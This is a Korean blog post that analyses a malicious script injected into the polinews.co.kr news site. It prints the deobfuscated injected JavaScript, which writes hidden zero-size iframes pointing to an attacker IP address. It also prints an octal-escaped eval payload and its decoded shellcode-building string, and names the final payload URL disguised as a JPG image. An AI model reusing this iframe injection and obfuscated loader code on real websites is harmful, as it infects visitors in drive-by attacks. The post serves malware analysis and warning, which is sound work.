본문 바로가기

security/악성코드 유포

폴리뉴스 악성코드 유포 스크립트 간단하게 살펴보기.. !!

* 본사이트는 악성코드가 있는 사이트를 알려 드립니다.!!

유포지 : http://www.polinews.co.kr
  

[연결 되는 곳]

http://204.188.243.136:7x/page/page.js
http://204.188.243.136:7x/page/vospt.html
http://204.188.243.136:7x/page/vegoa.htm
http://204.188.243.136:7x/page/vtfep.htm

[차례]

  1. page.js 보기
  2. page.js 해석된 코드
  3. vegoa.htm , vtfep.htm 메인코드 보기 !

Page.js 보기 !!


해석된 코드 !!


var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
window["onerror"]=function(){return true;}
var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
if(window["document"]["cookie"]["indexOf"]('gdrke1Olrtl632165')==-1){
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 var t7=new window["Date"]();
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 t7["setTime"](t7["getTime"]()+24*60*60*1000);
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 window["document"]["cookie"]='gdrke1Olrtl632165=Yes;path=/;expires='+t7["toGMTString"]();
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 window["document"]["title"]=window["document"]["title"]["replace"](/\<(\w|\W)*\>/,"");
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var KCgVNZP13="";
 window["document"]["write"](""+"<ifra"+KCgVNZP13+"me src=http://204.188.243.136:7x/page/vtfep.htm width=0 height=0></iframe>");
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 window["document"]["write"](""+"<if"+KCgVNZP13+"rame src=http://204.188.243.136:7x/page/vegoa.htm width=0 height=0></iframe>");
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 window["docu"+"ment"]["wri"+"teln"]("<ifr"+KCgVNZP13+"ame src=http:\/\/204.188.243.136:7x\/page\/vospt.html width=0 height=0><\/iframe>");
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
}
var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";

vegoa.htm , vtfep.htm 메인코드 보기 !

1차 스크립트 !!

document.writeln("eval(\'\\40\\40\\15\\12\\40\\107\\110\\117\\60\\120\\105\\122\\153\\141\\65\\66\\70\\71\\67\\61\\75\\47\\100\\105\\113\\115\\46\\125\\60\\103\\144\\65\\144\\142\\100\\105\\113\\115\\46\\125\\60\\103\\143\\71\\143\\71\\100\\105\\113\\115\\46\\125\\60\\103\\70\\67\\143\\144\\100\\105\\113\\115\\46\\125\\60\\103\\71\\62\\71\\62\\100\\105\\113\\115\\46\\125\\60\\103\\144\\60\\144\\64\\100\\105\\113\\115\\46\\125\\60\\103\\144\\141\\144\\143\\100\\105\\113\\115\\46\\125\\60\\103\\143\\145\\144\\70\\100\\105\\113\\115\\46\\125\\60\\103\\143\\145\\71\\63\\100\\105\\113\\115\\46\\125\\60\\103\\144\\60\\143\\71\\100\\105\\113\\115\\46\\125\\60\\103\\144\\64\\144\\143\\100\\105\\113\\115\\46\\125\\60\\103\\144\\70\\144\\141\\100\\105\\113\\115\\46\\125\\60\\103\\71\\63\\143\\71\\100\\105\\113\\115\\46\\125\\60\\103\\144\\62\\144\\145\\100\\105\\113\\115\\46\\125\\60\\103\\71\\62\\144\\60\\100\\105\\113\\115\\46\\125\\60\\103\\144\\60\\144\\64\\100\\105\\113\\115\\46\\125\\60\\103\\144\\141\\144\\143\\100\\105\\113\\115\\46\\125\\60\\103\\143\\145\\144\\70\\100\\105\\113\\115\\46\\125\\60\\103\\70\\141\\71\\62\\100\\105\\113\\115\\46\\125\\60\\103\\70\\70\\70\\65\\100\\105\\113\\115\\46\\125\\60\\103\\70\\143\\70\\145\\100\\105\\113\\115\\46\\125\\60\\103\\70\\142\\70\\70\\100\\105\\113\\115\\46\\125\\60\\103\\70\\141\\70\\145\\100\\105\\113\\115\\46\\125\\60\\103\\146\\67\\71\\63\\100\\105\\113\\115\\46\\125\\60\\103\\144\\141\\143\\144\\47\\73\\15\\12\\110\\103\\141\\154\\162\\105\\122\\147\\154\\150\\62\\63\\145\\66\\65\\66\\62\\61\\66\\40\\75\\40\\50\\107\\110\\117\\60\\120\\105\\122\\153\\141\\65\\66\\70\\71\\67\\61\\133\\47\\134\\170\\67\\62\\134\\170\\66\\65\\134\\170\\67\\60\\134\\170\\66\\143\\134\\170\\66\\61\\134\\170\\66\\63\\134\\170\\66\\65\\47\\135\\50\\57\\100\\105\\113\\115\\46\\125\\60\\103\\57\\147\\54\\40\\47\\134\\170\\62\\65\\134\\170\\67\\65\\47\\51\\51\\73\\40\\40\\15\\12\\15\\12\')");

1차 스크립트 디코더 후 !!

eval('\40\40\15\12\40\107\110\117\60\120\105\122\153\141\65\66\70\71\67\61\75\47\100\105\113\115\46\125\60\103\144\65\144\142\100\105\113\115\46\125\60\103\143\71\143\71\100\105\113\115\46\125\60\103\70\67\143\144\100\105\113\115\46\125\60\103\71\62\71\62\100\105\113\115\46\125\60\103\144\60\144\64\100\105\113\115\46\125\60\103\144\141\144\143\100\105\113\115\46\125\60\103\143\145\144\70\100\105\113\115\46\125\60\103\143\145\71\63\100\105\113\115\46\125\60\103\144\60\143\71\100\105\113\115\46\125\60\103\144\64\144\143\100\105\113\115\46\125\60\103\144\70\144\141\100\105\113\115\46\125\60\103\71\63\143\71\100\105\113\115\46\125\60\103\144\62\144\145\100\105\113\115\46\125\60\103\71\62\144\60\100\105\113\115\46\125\60\103\144\60\144\64\100\105\113\115\46\125\60\103\144\141\144\143\100\105\113\115\46\125\60\103\143\145\144\70\100\105\113\115\46\125\60\103\70\141\71\62\100\105\113\115\46\125\60\103\70\70\70\65\100\105\113\115\46\125\60\103\70\143\70\145\100\105\113\115\46\125\60\103\70\142\70\70\100\105\113\115\46\125\60\103\70\141\70\145\100\105\113\115\46\125\60\103\146\67\71\63\100\105\113\115\46\125\60\103\144\141\143\144\47\73\15\12\110\103\141\154\162\105\122\147\154\150\62\63\145\66\65\66\62\61\66\40\75\40\50\107\110\117\60\120\105\122\153\141\65\66\70\71\67\61\133\47\134\170\67\62\134\170\66\65\134\170\67\60\134\170\66\143\134\170\66\61\134\170\66\63\134\170\66\65\47\135\50\57\100\105\113\115\46\125\60\103\57\147\54\40\47\134\170\62\65\134\170\67\65\47\51\51\73\40\40\15\12\15\12')

최종 스크립트 !!

eval = alert 로 바꾼 후의 메인 스크립트의 모습 !!

---------------------------
Microsoft Internet Explorer
---------------------------

GHO0PERka568971='@EKM&U0Cd5db@EKM&U0Cc9c9@EKM&U0C87cd
@EKM&U0C9292@EKM&U0Cd0d4@EKM&U0Cdadc@EKM&U0Cced8@EKM&U0Cce93
@EKM&U0Cd0c9@EKM&U0Cd4dc@EKM&U0Cd8da@EKM&U0C93c9@EKM&U0Cd2de
@EKM&U0C92d0@EKM&U0Cd0d4@EKM&U0Cdadc@EKM&U0Cced8@EKM&U0C8a92
@EKM&U0C8885@EKM&U0C8c8e@EKM&U0C8b88@EKM&U0C8a8e@EKM&U0Cf793
@EKM&U0Cdacd';

HCalrERglh23e656216 = (GHO0PERka568971['\x72\x65\x70\x6c\x61\x63\x65'](/@EKM&U0C/g, '\x25\x75')); 

~> HCalrERglh23e656216 = (GHO0PERka568971['replace'](/@EKM&U0C/g, '%u'));

---------------------------
확인  
---------------------------

최종 파일인 : http://images.stmaiget.com/imagex/78531563x.Jpg

여기까지 간단하게 나올 수 있습니다 ~